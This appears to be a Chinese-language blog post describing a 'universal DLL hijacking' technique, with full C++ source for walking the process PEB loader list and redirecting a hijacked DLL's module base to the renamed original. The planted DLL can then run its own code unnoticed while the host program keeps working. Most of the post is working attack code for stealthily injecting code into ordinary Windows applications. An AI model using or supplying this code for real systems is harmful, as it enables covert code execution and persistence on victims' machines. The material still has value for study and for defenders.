通用dll劫持技术

红太狼 2021-04-06 13:34 552阅读 0赞

原理很简单就是你自己的dll加载被劫持的dll，通过loadlibrary，但是你替换了dll后面peb保存的是你当前的dll的句柄，调用的时候就是去你这个dll调用，这很定不行的有的东西只有原来的被劫持的有，不可能 把所有功能实现一遍，做法是把你loadlibrary被劫持的那个句柄替换成peb中名称被你防造的那个句柄。这样就调用时调用原来的而你的dll安心干其它活。  
核心代码  
//dllhijack.cpp

#include "dllhijack.h"
    #include <windows.h>
    
    typedef struct _UNICODE_STRING {
        USHORT Length;
        USHORT MaximumLength;
        PWSTR  Buffer;
    } UNICODE_STRING, *PUNICODE_STRING;
    
    typedef struct _PEB_LDR_DATA
    {
        ULONG Length; // +0x00
        BOOLEAN Initialized; // +0x04
        PVOID SsHandle; // +0x08
        LIST_ENTRY InLoadOrderModuleList; // +0x0c
        LIST_ENTRY InMemoryOrderModuleList; // +0x14
        LIST_ENTRY InInitializationOrderModuleList;// +0x1c
    } PEB_LDR_DATA, *PPEB_LDR_DATA; // +0x24
    
    typedef struct _LDR_DATA_TABLE_ENTRY
    {
        LIST_ENTRY InLoadOrderLinks;
        LIST_ENTRY InMemoryOrderLinks;
        LIST_ENTRY InInitializationOrderLinks;
        PVOID DllBase;
        PVOID EntryPoint;
        ULONG SizeOfImage;
        UNICODE_STRING FullDllName;
        UNICODE_STRING BaseDllName;
        ULONG Flags;
        WORD LoadCount;
        WORD TlsIndex;
        union
        {
            LIST_ENTRY HashLinks;
            struct
            {
                PVOID SectionPointer;
                ULONG CheckSum;
            };
        };
        union
        {
            ULONG TimeDateStamp;
            PVOID LoadedImports;
        };
        _ACTIVATION_CONTEXT * EntryPointActivationContext;
        PVOID PatchInformation;
        LIST_ENTRY ForwarderLinks;
        LIST_ENTRY ServiceTagLinks;
        LIST_ENTRY StaticLinks;
    } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
    
    void* NtCurrentPeb()
    {
    #ifdef _WIN64
        return (void*)__readgsqword(0x30);
    #else
        __asm {
            mov eax, fs:[0x30];
        }
    #endif
    }
    
    PEB_LDR_DATA* NtGetPebLdr(void* peb)
    {
    #ifdef _WIN64
        return (PEB_LDR_DATA*)(*(ULONGLONG*)((BYTE*)peb + 0x18));
    #else
        __asm {
            mov eax, peb;
            mov eax, [eax + 0xc];
        }
    #endif
    }
    
    /*
    dllname:        被劫持dll的原始名字
    OrigDllPath:    被劫持dll改名后的完整路径
    */
    void SuperDllHijack(LPCWSTR dllname, LPWSTR OrigDllPath)
    {
        WCHAR wszDllName[100] = { 0 };
        void* peb = NtCurrentPeb();
        PEB_LDR_DATA* ldr = NtGetPebLdr(peb);
    
        for (LIST_ENTRY* entry = ldr->InLoadOrderModuleList.Blink;
            entry != (LIST_ENTRY*)(&ldr->InLoadOrderModuleList);
            entry = entry->Blink) {
            PLDR_DATA_TABLE_ENTRY data = (PLDR_DATA_TABLE_ENTRY)entry;
    
            memset(wszDllName, 0, 100 * 2);
            memcpy(wszDllName, data->BaseDllName.Buffer, data->BaseDllName.Length);
    
            if (!_wcsicmp(wszDllName, dllname)) {
                HMODULE hMod = LoadLibrary(OrigDllPath);
                data->DllBase = hMod;
                break;
            }
        }
    }